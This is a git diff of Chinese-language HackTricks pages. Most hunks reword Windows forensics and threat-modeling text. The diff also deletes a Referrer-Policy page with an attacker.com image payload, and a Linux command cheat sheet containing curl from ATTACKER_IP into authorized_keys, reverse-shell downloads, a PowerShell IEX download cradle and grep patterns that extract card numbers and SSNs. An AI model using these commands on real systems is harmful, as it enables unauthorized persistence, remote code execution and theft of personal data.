@ -244,7 +242,7 @@ Windows 注册表存储大量系统和用户活动数据,包含在以下文件
一些工具对于分析注册表文件非常有用:
- **注册表编辑器**:它安装在 Windows 中。它是一个 GUI用于浏览当前会话的 Windows 注册表。
- [**Registry Explorer**](https://ericzimmerman.github.io/#!index.md):它允许您加载注册表文件并通过 GUI 浏览它们。它还包含书签,突出显示包含有趣信息的键。
- [**Registry Explorer**](https://ericzimmerman.github.io/#!index.md):它允许您加载注册表文件并通过 GUI 浏览。它还包含书签,突出显示具有有趣信息的键。
- [**RegRipper**](https://github.com/keydet89/RegRipper3.0):同样,它具有一个 GUI允许浏览加载的注册表并且还包含突出显示加载的注册表中有趣信息的插件。
- [**Windows 注册表恢复**](https://www.mitec.cz/wrr.html):另一个 GUI 应用程序,能够从加载的注册表中提取重要信息。
@ -258,9 +256,9 @@ Windows 注册表存储大量系统和用户活动数据,包含在以下文件
### SAM
文件/注册表 **SAM** 包含系统的 **用户、组和用户密码** 哈希。
文件/哈希 **SAM** 包含系统的 **用户、组和用户密码** 哈希。
`SAM\Domains\Account\Users`您可以获取用户名、RID、最后登录、最后失败登录、登录计数、密码策略以及帐户创建时间。要获取 **哈希**,您还 **需要** 文件/注册表 **SYSTEM**
`SAM\Domains\Account\Users`您可以获取用户名、RID、最后登录、最后失败登录、登录计数、密码策略以及帐户创建时间。要获取 **哈希**,您还 **需要** 文件/哈希 **SYSTEM**
### Windows 注册表中的有趣条目
@ -276,9 +274,9 @@ interesting-windows-registry-keys.md
### Windows Recent APPs
在注册表 `NTUSER.DAT` 的路径 `Software\Microsoft\Current Version\Search\RecentApps` 中,您可以找到有关 **执行的应用程序**、**最后一次** 执行的时间和 **启动次数** 的子键。
在注册表 `NTUSER.DAT` 的路径 `Software\Microsoft\Current Version\Search\RecentApps` 中,您可以找到有关 **执行的应用程序**、**最后一次** 执行的时间和 **启动次数** 的子键。
### BAM (后台活动调节器)
### BAM(后台活动调节器)
您可以使用注册表编辑器打开 `SYSTEM` 文件,在路径 `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` 中找到有关 **每个用户执行的应用程序** 的信息(注意路径中的 `{SID}`)以及 **它们执行的时间**(时间在注册表的 Data 值中)。
@ -288,9 +286,9 @@ interesting-windows-registry-keys.md
Windows 预取由创建 **已执行程序的缓存** 组成,以便能够更快地加载它们。这些缓存作为 `.pf` 文件创建,路径为: `C:\Windows\Prefetch`。在 XP/VISTA/WIN7 中限制为 128 个文件,在 Win8/Win10 中限制为 1024 个文件。
文件名的格式为 `{program_name}-{hash}.pf`(哈希基于可执行文件的路径和参数)。在 W10 中,这些文件是压缩的。请注意,文件的存在仅表明 **程序在某个时刻被执行**。
文件名的格式为 `{program_name}-{hash}.pf`(哈希基于可执行文件的路径和参数)。在 W10 中,这些文件是压缩的。请注意,文件的存在仅表明 **程序在某个时刻被执行**。
文件 `C:\Windows\Prefetch\Layout.ini` 包含 **被预取文件的文件夹名称**文件包含 **执行次数**、**执行日期** 和 **程序打开的文件** 的信息。
文件 `C:\Windows\Prefetch\Layout.ini` 包含 **被预取文件的文件夹名称**文件包含 **执行次数**、**执行日期** 和 **程序打开的文件** 的信息。
要检查这些文件,您可以使用工具 [**PEcmd.exe**](https://github.com/EricZimmerman/PECmd)
```bash
@ -339,8 +337,8 @@ Windows 预取由创建 **已执行程序的缓存** 组成,以便能够更快
这些数据根据操作系统的版本存储在注册表的特定位置:
- 对于 XP数据存储在 `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` 下,最多可容纳 96 条目。
- 对于 Server 2003以及 Windows 版本 2008、2012、2016、7、8 和 10存储路径为 `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache`,分别可容纳 512 和 1024 条目。
- 对于 XP数据存储在 `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` 下,最多可容纳 96 条目。
- 对于 Server 2003以及 Windows 版本 2008、2012、2016、7、8 和 10存储路径为 `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache`,分别可容纳 512 和 1024 条目。
要解析存储的信息,建议使用 [**AppCompatCacheParser** tool](https://github.com/EricZimmerman/AppCompatCacheParser)。
@ -366,35 +364,35 @@ AmcacheParser.exe -f C:\Users\genericUser\Desktop\Amcache.hve --csv C:\Users\gen
您可以使用工具 [**RecentFileCacheParse**](https://github.com/EricZimmerman/RecentFileCacheParser) 来解析该文件。
### Scheduled tasks
### 计划任务
您可以从 `C:\Windows\Tasks``C:\Windows\System32\Tasks` 中提取它们,并将其作为 XML 读取。
您可以从 `C:\Windows\Tasks``C:\Windows\System32\Tasks` 中提取它们,并以 XML 格式读取。
### Services
### 服务
您可以在注册表中找到它们,路径为 `SYSTEM\ControlSet001\Services`。您可以查看将要执行的内容及其时间。
### **Windows Store**
已安装的应用程序可以在 `\ProgramData\Microsoft\Windows\AppRepository\` 中找到。\
此存储库中有一个 **log**,记录了系统中 **每个已安装的应用程序**,存储在数据库 **`StateRepository-Machine.srd`** 中。
该存储库有一个 **日志**,记录了系统中 **每个已安装的应用程序**,存储在数据库 **`StateRepository-Machine.srd`** 中。
在该数据库的应用程序表中可以找到列“Application ID”、“PackageNumber”和“Display Name”。这些列包含有关预安装和已安装应用程序的信息如果某些应用程序被卸载可以找到因为已安装应用程序的 ID 应该是连续的。
您还可以在注册表路径 `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`**找到已安装的应用程序**\
`Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\`找到 **已卸载的应用程序**。
`Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\`**找到已卸载的应用程序**。
## Windows Events
## Windows 事件
Windows 事件中出现的信息包括:
- 发生了什么
- 时间戳 (UTC + 0)
- 时间戳UTC + 0
- 相关用户
- 相关主机 (主机名IP)
- 访问的资产 (文件,文件夹,打印机,服务)
- 相关主机主机名IP
- 访问的资产(文件,文件夹,打印机,服务)
日志位于 `C:\Windows\System32\config`(在 Windows Vista 之前)和 `C:\Windows\System32\winevt\Logs`(在 Windows Vista 之后)。在 Windows Vista 之前,事件日志是二进制格式,而之后则是 **XML 格式**,并使用 **.evtx** 扩展名。
日志位于 `C:\Windows\System32\config`(在 Windows Vista 之前)和 `C:\Windows\System32\winevt\Logs`(在 Windows Vista 之后)。在 Windows Vista 之前,事件日志是二进制格式,之后则为 **XML 格式**,并使用 **.evtx** 扩展名。
事件文件的位置可以在 SYSTEM 注册表中找到,路径为 **`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`**。
@ -402,7 +400,7 @@ Windows 事件中出现的信息包括:
## 理解 Windows 安全事件日志
访问事件记录在位于 `C:\Windows\System32\winevt\Security.evtx` 的安全配置文件中。该文件的大小是可调的,当其容量达到时,事件会被覆盖。记录的事件包括用户登录和注销、用户操作以及安全设置的更改,以及文件、文件夹和共享资产的访问。
访问事件记录在位于 `C:\Windows\System32\winevt\Security.evtx` 的安全配置文件中。该文件的大小是可调的,当其容量达到时,旧事件会被覆盖。记录的事件包括用户登录和注销、用户操作以及安全设置的更改,以及文件、文件夹和共享资产的访问。
### 用户身份验证的关键事件 ID
@ -415,7 +413,7 @@ Windows 事件中出现的信息包括:
- **Interactive (2)**:直接用户登录。
- **Network (3)**:访问共享文件夹。
- **Batch (4)**:执行批处理。
- **Batch (4)**:执行批处理过程
- **Service (5)**:服务启动。
- **Proxy (6)**:代理认证。
- **Unlock (7)**:使用密码解锁屏幕。
@ -429,10 +427,10 @@ Windows 事件中出现的信息包括:
#### EventID 4625 的状态和子状态代码:
- **0xC0000064**:用户名不存在 - 可能表示用户名枚举攻击。
- **0xC000006A**:正确的用户名但错误的密码 - 可能是密码猜测或暴力破解尝试。
- **0xC000006A**:正确的用户名但密码错误 - 可能是密码猜测或暴力破解尝试。
- **0xC0000234**:用户账户被锁定 - 可能是在暴力攻击后导致多次登录失败。
- **0xC0000072**:账户已禁用 - 未经授权尝试访问禁用账户。
- **0xC000006F**:在允许的时间外登录 - 表示在设定的登录时间之外尝试访问,可能是未经授权的访问迹象。
- **0xC0000072**:账户已禁用 - 未经授权尝试访问禁用账户。
- **0xC000006F**:在允许的时间外登录 - 表示在设定的登录时间之外的访问尝试,可能是未经授权的访问迹象。
- **0xC0000070**:违反工作站限制 - 可能是尝试从未经授权的位置登录。
- **0xC0000193**:账户过期 - 使用过期用户账户的访问尝试。
- **0xC0000071**:密码过期 - 使用过时密码的登录尝试。
@ -447,7 +445,7 @@ Windows 事件中出现的信息包括:
#### EventID 6005 和 6006
- **系统启动和关闭**EventID 6005 表示系统启动,而 EventID 6006 表示系统关闭。
- **系统启动和关闭**EventID 6005 表示系统启动,而 EventID 6006 标记系统关闭。
#### EventID 1102
@ -465,7 +463,7 @@ Windows 事件中出现的信息包括:
### 恢复 Windows 事件
为了提高恢复已删除 Windows 事件的机会,建议通过直接拔掉电源来关闭可疑计算机。**Bulk_extractor** 是一指定 `.evtx` 扩展名的恢复工具,推荐用于尝试恢复此类事件。
为了提高恢复已删除 Windows 事件的机会,建议通过直接拔掉电源来关闭可疑计算机。**Bulk_extractor** 是一指定 `.evtx` 扩展名的恢复工具,推荐用于尝试恢复此类事件。
### 通过 Windows 事件识别常见攻击
@ -485,7 +483,7 @@ Windows 事件中出现的信息包括:
#### 系统电源事件
EventID 6005 表示系统启动,而 EventID 6006 表示关闭。
EventID 6005 表示系统启动,而 EventID 6006 标记系统关闭。
#### 日志删除

8
src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md
View File

@ -1,7 +1,5 @@
# 有趣的 Windows 注册表键
### 有趣的 Windows 注册表键
{{#include ../../../banners/hacktricks-training.md}}
### **Windows 版本和所有者信息**
@ -27,7 +25,7 @@
### 启用最后访问时间
- 启用最后访问时间跟踪可以让您看文件最后一次打开的时间,这对于取证分析或系统监控至关重要。
- 启用最后访问时间跟踪可以让您看文件最后一次打开的时间,这对于取证分析或系统监控至关重要。
### 网络信息详细信息
@ -35,7 +33,7 @@
### 客户端缓存 (CSC)
- **CSC** 通过缓存共享文件的副本来增强离线文件访问。不同的 **CSCFlags** 设置控制缓存哪些文件和如何缓存,影响性能和用户体验,尤其是在连接不稳定的环境中。
- **CSC** 通过缓存共享文件的副本来增强离线文件访问。不同的 **CSCFlags** 设置控制缓存的文件类型和方式,影响性能和用户体验,特别是在连接不稳定的环境中。
### 自动启动程序
@ -96,6 +94,6 @@
- 通过在 `NTUSER.DAT` 注册表中搜索设备的 **{GUID}**,可以确定与特定 USB 设备相关的用户。
- 最后挂载的设备及其卷序列号可以通过 `System\MountedDevices``Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt` 分别追踪。
本指南概述了访问 Windows 系统上详细系统、网络和用户活动信息的关键路径和方法,旨在提供清晰和可用性。
本指南总结了访问 Windows 系统上详细系统、网络和用户活动信息的关键路径和方法,旨在提供清晰和可用性。
{{#include ../../../banners/hacktricks-training.md}}

34
src/generic-methodologies-and-resources/threat-modeling.md
View File

@ -1,8 +1,10 @@
# 威胁建模
{{#include /banners/hacktricks-training.md}}
## 威胁建模
欢迎来到 HackTricks 的全面威胁建模指南!开始探索网络安全这一关键方面,在这里我们识别、理解并制定针对系统潜在漏洞的策略。此线程作为逐步指南,包含真实案例、有用的软件和易于理解的解释。非常适合希望加强网络安全防御的新手和经验丰富的从业者。
欢迎来到 HackTricks 的全面威胁建模指南!开始探索网络安全这一关键方面,我们识别、理解并制定针对系统潜在漏洞的策略。此线程作为逐步指南,包含真实案例、实用软件和易于理解的解释。非常适合希望加强网络安全防御的新手和经验丰富的从业者。
### 常用场景
@ -11,22 +13,22 @@
### 威胁模型概述
威胁模型通常以图表、图像或其他形式的可视化插图表示,描绘应用程序的计划架构或现有构建。它类似于**数据流图**,但关键区别在于其安全导向的设计。
威胁模型通常以图表、图像或其他形式的视觉插图表示,描绘应用程序的计划架构或现有构建。它与**数据流图**相似,但关键区别在于其安全导向的设计。
威胁模型通常包含用红色标记的元素,象征潜在的漏洞、风险或障碍。为了简化风险识别过程,采用 CIA机密性、完整性、可用性三元组构成许多威胁建模方法的基础其中 STRIDE 是最常见的之一。然而,所选方法可能会根据特定上下文和要求而有所不同。
威胁模型通常包含用红色标记的元素,象征潜在的漏洞、风险或障碍。为了简化风险识别过程,采用 CIA机密性、完整性、可用性三元组构成许多威胁建模方法的基础其中 STRIDE 是最常见的。然而,所选方法可能会根据具体上下文和要求而有所不同。
### CIA 三元组
CIA 三元组是信息安全领域广泛认可的模型,代表机密性、完整性和可用性。这三大支柱构成了许多安全措施和政策的基础,包括威胁建模方法。
1. **机密性**:确保数据或系统不被未经授权的个人访问。这是安全的核心方面,需要适当的访问控制、加密和其他措施以防止数据泄露。
2. **完整性**:数据在其生命周期内的准确性、一致性和可信度。该原则确保数据不被未经授权的方更改或篡改。通常涉及校验和、哈希和其他数据验证方法。
2. **完整性**:数据在其生命周期内的准确性、一致性和可信性。该原则确保数据未被未经授权的方篡改或更改。通常涉及校验和、哈希和其他数据验证方法。
3. **可用性**:确保数据和服务在需要时可供授权用户访问。这通常涉及冗余、容错和高可用性配置,以保持系统在中断情况下的运行。
### 威胁建模方法
1. **STRIDE**由微软开发STRIDE 是**欺骗、篡改、否认、信息泄露、拒绝服务和特权提升**的首字母缩略词。每个类别代表一种威胁,这种方法通常用于程序或系统的设计阶段,以识别潜在威胁。
2. **DREAD**:这是微软用于识别威胁风险评估的另一种方法。DREAD 代表**损害潜力、可重现性、可利用性、受影响用户和可发现性**。这些因素中的每一个都被评分,结果用于优先处理已识别的威胁。
1. **STRIDE**由微软开发STRIDE 是**欺骗、篡改、否认、信息泄露、服务拒绝和特权提升**的首字母缩略词。每个类别代表一种威胁,这种方法通常在程序或系统的设计阶段用于识别潜在威胁。
2. **DREAD**这是微软用于识别威胁风险评估的另一种方法。DREAD 代表**损害潜力、可重现性、可利用性、受影响用户和可发现性**。每个因素都被评分,结果用于优先处理识别的威胁。
3. **PASTA**(攻击模拟和威胁分析过程):这是一种七步的**风险中心**方法。它包括定义和识别安全目标、创建技术范围、应用程序分解、威胁分析、漏洞分析和风险/分流评估。
4. **Trike**:这是一种基于风险的方法,专注于保护资产。它从**风险管理**的角度出发,关注威胁和漏洞。
5. **VAST**(可视化、敏捷和简单的威胁建模):这种方法旨在更易于访问,并集成到敏捷开发环境中。它结合了其他方法的元素,专注于**威胁的可视化表示**。
@ -34,11 +36,11 @@ CIA 三元组是信息安全领域广泛认可的模型,代表机密性、完
## 工具
有几种工具和软件解决方案可用,以**协助**创建和管理威胁模型。以下是您可能考虑的一些工具。
有几种工具和软件解决方案可用于**协助**创建和管理威胁模型。以下是您可以考虑的一些工具。
### [SpiderSuite](https://github.com/3nock/SpiderSuite)
一个先进的跨平台多功能 GUI 网络爬虫/蜘蛛适用于网络安全专业人员。Spider Suite 可用于攻击面映射和分析。
一个先进的跨平台多功能 GUI 网络爬虫/蜘蛛适用于网络安全专业人员。Spider Suite 可用于攻击面映射和分析。
**使用方法**
@ -46,13 +48,13 @@ CIA 三元组是信息安全领域广泛认可的模型,代表机密性、完
<figure><img src="../images/threatmodel_spidersuite_1.png" alt=""><figcaption></figcaption></figure>
2. 查看图
2. 查看图
<figure><img src="../images/threatmodel_spidersuite_2.png" alt=""><figcaption></figcaption></figure>
### [OWASP Threat Dragon](https://github.com/OWASP/threat-dragon/releases)
OWASP 的一个开源项目Threat Dragon 是一个包系统图示和规则引擎以自动生成威胁/缓解措施的网络和桌面应用程序。
OWASP 的一个开源项目Threat Dragon 是一个包系统图示和规则引擎以自动生成威胁/缓解措施的网络和桌面应用程序。
**使用方法**
@ -78,10 +80,10 @@ OWASP 的一个开源项目Threat Dragon 是一个包括系统图示和规则
<figure><img src="../images/0_basic_threat_model.jpg" alt=""><figcaption></figcaption></figure>
关于实体的简要说明
关于实体的简单解释
- 过程(实体本身,如 Web 服务器或 Web 功能)
- 参与者(如网站访客、用户或管理员的人)
- 行为者(如网站访客、用户或管理员的人)
- 数据流线(交互的指示)
- 信任边界(不同的网络段或范围。)
- 存储(数据存储的地方,如数据库)
@ -96,16 +98,18 @@ OWASP 的一个开源项目Threat Dragon 是一个包括系统图示和规则
<figure><img src="../images/4_threatmodel_create-threat.jpg" alt=""><figcaption></figcaption></figure>
请记住,参与者威胁和过程威胁之间是有区别的。如果您要向参与者添加威胁,则只能选择“欺骗”和“否认”。然而在我们的示例中,我们将威胁添加到过程实体,因此我们将在威胁创建框中看到:
请记住,行为者威胁和过程威胁之间是有区别的。如果您要向行为者添加威胁,则只能选择“欺骗”和“否认”。然而在我们的示例中,我们将威胁添加到过程实体,因此我们将在威胁创建框中看到:
<figure><img src="../images/2_threatmodel_type-option.jpg" alt=""><figcaption></figcaption></figure>
6. 完成
现在您完成的模型应该看起来像这样。这就是如何使用 OWASP Threat Dragon 制作简单的威胁模型。
现在您完成的模型应该看起来像这样。这就是如何使用 OWASP Threat Dragon 制作简单的威胁模型。
<figure><img src="../images/threat_model_finished.jpg" alt=""><figcaption></figcaption></figure>
### [Microsoft Threat Modeling Tool](https://aka.ms/threatmodelingtool)
这是微软提供的免费工具,帮助在软件项目的设计阶段发现威胁。它使用 STRIDE 方法,特别适合在微软技术栈上开发的人员。
这是微软提供的一个免费工具,帮助在软件项目的设计阶段发现威胁。它使用 STRIDE 方法,特别适合在微软技术栈上开发的人员。
{{#include /banners/hacktricks-training.md}}

BIN
src/images/cyberhelmets-logo.png
View File

Binary file not shown.
Side by Side Swipe Overlay

Before

Width:  |  Height:  |  Size: 16 KiB

After

Width:  |  Height:  |  Size: 16 KiB

35
src/interesting-http.md
View File

@ -1,35 +0,0 @@
{{#include ./banners/hacktricks-training.md}}
# 引荐头和策略
引荐是浏览器用来指示上一个访问页面的头部。
## 敏感信息泄露
如果在网页的某个地方任何敏感信息位于GET请求参数中如果页面包含指向外部源的链接或者攻击者能够使/建议社会工程用户访问由攻击者控制的URL。这可能会导致在最新的GET请求中泄露敏感信息。
## 缓解措施
您可以让浏览器遵循一个**Referrer-policy**,以**避免**将敏感信息发送到其他Web应用程序
```
Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url
```
## Counter-Mitigation
您可以使用 HTML meta 标签覆盖此规则(攻击者需要利用 HTML 注入):
```html
<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">
```
## 防御
永远不要将任何敏感数据放入GET参数或URL中的路径。
{{#include ./banners/hacktricks-training.md}}

297
src/linux-hardening/useful-linux-commands/README.md
View File

@ -1,297 +0,0 @@
# 有用的 Linux 命令
{{#include ../../banners/hacktricks-training.md}}
## 常见的 Bash
```bash
#Exfiltration using Base64
base64 -w 0 file
#Get HexDump without new lines
xxd -p boot12.bin | tr -d '\n'
#Add public key to authorized keys
curl https://ATTACKER_IP/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys
#Echo without new line and Hex
echo -n -e
#Count
wc -l <file> #Lines
wc -c #Chars
#Sort
sort -nr #Sort by number and then reverse
cat file | sort | uniq #Sort and delete duplicates
#Replace in file
sed -i 's/OLD/NEW/g' path/file #Replace string inside a file
#Download in RAM
wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm
curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
#Files used by network processes
lsof #Open files belonging to any process
lsof -p 3 #Open files used by the process
lsof -i #Files used by networks processes
lsof -i 4 #Files used by network IPv4 processes
lsof -i 6 #Files used by network IPv6 processes
lsof -i 4 -a -p 1234 #List all open IPV4 network files in use by the process 1234
lsof +D /lib #Processes using files inside the indicated dir
lsof -i :80 #Files uses by networks processes
fuser -nv tcp 80
#Decompress
tar -xvzf /path/to/yourfile.tgz
tar -xvjf /path/to/yourfile.tbz
bzip2 -d /path/to/yourfile.bz2
tar jxf file.tar.bz2
gunzip /path/to/yourfile.gz
unzip file.zip
7z -x file.7z
sudo apt-get install xz-utils; unxz file.xz
#Add new user
useradd -p 'openssl passwd -1 <Password>' hacker
#Clipboard
xclip -sel c < cat file.txt
#HTTP servers
python -m SimpleHTTPServer 80
python3 -m http.server
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"
php -S $ip:80
#Curl
#json data
curl --header "Content-Type: application/json" --request POST --data '{"password":"password", "username":"admin"}' http://host:3000/endpoint
#Auth via JWT
curl -X GET -H 'Authorization: Bearer <JWT>' http://host:3000/endpoint
#Send Email
sendEmail -t to@email.com -f from@email.com -s 192.168.8.131 -u Subject -a file.pdf #You will be prompted for the content
#DD copy hex bin file without first X (28) bytes
dd if=file.bin bs=28 skip=1 of=blob
#Mount .vhd files (virtual hard drive)
sudo apt-get install libguestfs-tools
guestmount --add NAME.vhd --inspector --ro /mnt/vhd #For read-only, create first /mnt/vhd
# ssh-keyscan, help to find if 2 ssh ports are from the same host comparing keys
ssh-keyscan 10.10.10.101
# Openssl
openssl s_client -connect 10.10.10.127:443 #Get the certificate from a server
openssl x509 -in ca.cert.pem -text #Read certificate
openssl genrsa -out newuser.key 2048 #Create new RSA2048 key
openssl req -new -key newuser.key -out newuser.csr #Generate certificate from a private key. Recommended to set the "Organizatoin Name"(Fortune) and the "Common Name" (newuser@fortune.htb)
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Create certificate
openssl x509 -req -in newuser.csr -CA intermediate.cert.pem -CAkey intermediate.key.pem -CAcreateserial -out newuser.pem -days 1024 -sha256 #Create a signed certificate
openssl pkcs12 -export -out newuser.pfx -inkey newuser.key -in newuser.pem #Create from the signed certificate the pkcs12 certificate format (firefox)
# If you only needs to create a client certificate from a Ca certificate and the CA key, you can do it using:
openssl pkcs12 -export -in ca.cert.pem -inkey ca.key.pem -out client.p12
# Decrypt ssh key
openssl rsa -in key.ssh.enc -out key.ssh
#Decrypt
openssl enc -aes256 -k <KEY> -d -in backup.tgz.enc -out b.tgz
#Count number of instructions executed by a program, need a host based linux (not working in VM)
perf stat -x, -e instructions:u "ls"
#Find trick for HTB, find files from 2018-12-12 to 2018-12-14
find / -newermt 2018-12-12 ! -newermt 2018-12-14 -type f -readable -not -path "/proc/*" -not -path "/sys/*" -ls 2>/dev/null
#Reconfigure timezone
sudo dpkg-reconfigure tzdata
#Search from which package is a binary
apt-file search /usr/bin/file #Needed: apt-get install apt-file
#Protobuf decode https://www.ezequiel.tech/2020/08/leaking-google-cloud-projects.html
echo "CIKUmMesGw==" | base64 -d | protoc --decode_raw
#Set not removable bit
sudo chattr +i file.txt
sudo chattr -i file.txt #Remove the bit so you can delete it
# List files inside zip
7z l file.zip
```
## Windows 的 Bash
```bash
#Base64 for Windows
echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')" | iconv --to-code UTF-16LE | base64 -w0
#Exe compression
upx -9 nc.exe
#Exe2bat
wine exe2bat.exe nc.exe nc.txt
#Compile Windows python exploit to exe
pip install pyinstaller
wget -O exploit.py http://www.exploit-db.com/download/31853
python pyinstaller.py --onefile exploit.py
#Compile for windows
#sudo apt-get install gcc-mingw-w64-i686
i686-mingw32msvc-gcc -o executable useradd.c
```
## Greps
```bash
#Extract emails from file
grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" file.txt
#Extract valid IP addresses
grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" file.txt
#Extract passwords
grep -i "pwd\|passw" file.txt
#Extract users
grep -i "user\|invalid\|authentication\|login" file.txt
# Extract hashes
#Extract md5 hashes ({32}), sha1 ({40}), sha256({64}), sha512({128})
egrep -oE '(^|[^a-fA-F0-9])[a-fA-F0-9]{32}([^a-fA-F0-9]|$)' *.txt | egrep -o '[a-fA-F0-9]{32}' > md5-hashes.txt
#Extract valid MySQL-Old hashes
grep -e "[0-7][0-9a-f]{7}[0-7][0-9a-f]{7}" *.txt > mysql-old-hashes.txt
#Extract blowfish hashes
grep -e "$2a\$\08\$(.){75}" *.txt > blowfish-hashes.txt
#Extract Joomla hashes
egrep -o "([0-9a-zA-Z]{32}):(w{16,32})" *.txt > joomla.txt
#Extract VBulletin hashes
egrep -o "([0-9a-zA-Z]{32}):(S{3,32})" *.txt > vbulletin.txt
#Extraxt phpBB3-MD5
egrep -o '$H$S{31}' *.txt > phpBB3-md5.txt
#Extract Wordpress-MD5
egrep -o '$P$S{31}' *.txt > wordpress-md5.txt
#Extract Drupal 7
egrep -o '$S$S{52}' *.txt > drupal-7.txt
#Extract old Unix-md5
egrep -o '$1$w{8}S{22}' *.txt > md5-unix-old.txt
#Extract md5-apr1
egrep -o '$apr1$w{8}S{22}' *.txt > md5-apr1.txt
#Extract sha512crypt, SHA512(Unix)
egrep -o '$6$w{8}S{86}' *.txt > sha512crypt.txt
#Extract e-mails from text files
grep -E -o "\b[a-zA-Z0-9.#?$*_-]+@[a-zA-Z0-9.#?$*_-]+.[a-zA-Z0-9.-]+\b" *.txt > e-mails.txt
#Extract HTTP URLs from text files
grep http | grep -shoP 'http.*?[" >]' *.txt > http-urls.txt
#For extracting HTTPS, FTP and other URL format use
grep -E '(((https|ftp|gopher)|mailto)[.:][^ >" ]*|www.[-a-z0-9.]+)[^ .,; >">):]' *.txt > urls.txt
#Note: if grep returns "Binary file (standard input) matches" use the following approaches # tr '[\000-\011\013-\037177-377]' '.' < *.log | grep -E "Your_Regex" OR # cat -v *.log | egrep -o "Your_Regex"
#Extract Floating point numbers
grep -E -o "^[-+]?[0-9]*.?[0-9]+([eE][-+]?[0-9]+)?$" *.txt > floats.txt
# Extract credit card data
#Visa
grep -E -o "4[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > visa.txt
#MasterCard
grep -E -o "5[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > mastercard.txt
#American Express
grep -E -o "\b3[47][0-9]{13}\b" *.txt > american-express.txt
#Diners Club
grep -E -o "\b3(?:0[0-5]|[68][0-9])[0-9]{11}\b" *.txt > diners.txt
#Discover
grep -E -o "6011[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > discover.txt
#JCB
grep -E -o "\b(?:2131|1800|35d{3})d{11}\b" *.txt > jcb.txt
#AMEX
grep -E -o "3[47][0-9]{2}[ -]?[0-9]{6}[ -]?[0-9]{5}" *.txt > amex.txt
# Extract IDs
#Extract Social Security Number (SSN)
grep -E -o "[0-9]{3}[ -]?[0-9]{2}[ -]?[0-9]{4}" *.txt > ssn.txt
#Extract Indiana Driver License Number
grep -E -o "[0-9]{4}[ -]?[0-9]{2}[ -]?[0-9]{4}" *.txt > indiana-dln.txt
#Extract US Passport Cards
grep -E -o "C0[0-9]{7}" *.txt > us-pass-card.txt
#Extract US Passport Number
grep -E -o "[23][0-9]{8}" *.txt > us-pass-num.txt
#Extract US Phone Numberss
grep -Po 'd{3}[s-_]?d{3}[s-_]?d{4}' *.txt > us-phones.txt
#Extract ISBN Numbers
egrep -a -o "\bISBN(?:-1[03])?:? (?=[0-9X]{10}$|(?=(?:[0-9]+[- ]){3})[- 0-9X]{13}$|97[89][0-9]{10}$|(?=(?:[0-9]+[- ]){4})[- 0-9]{17}$)(?:97[89][- ]?)?[0-9]{1,5}[- ]?[0-9]+[- ]?[0-9]+[- ]?[0-9X]\b" *.txt > isbn.txt
```
## 查找
```bash
# Find SUID set files.
find / -perm /u=s -ls 2>/dev/null
# Find SGID set files.
find / -perm /g=s -ls 2>/dev/null
# Found Readable directory and sort by time. (depth = 4)
find / -type d -maxdepth 4 -readable -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r
# Found Writable directory and sort by time. (depth = 10)
find / -type d -maxdepth 10 -writable -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r
# Or Found Own by Current User and sort by time. (depth = 10)
find / -maxdepth 10 -user $(id -u) -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r
# Or Found Own by Current Group ID and Sort by time. (depth = 10)
find / -maxdepth 10 -group $(id -g) -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r
# Found Newer files and sort by time. (depth = 5)
find / -maxdepth 5 -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r | less
# Found Newer files only and sort by time. (depth = 5)
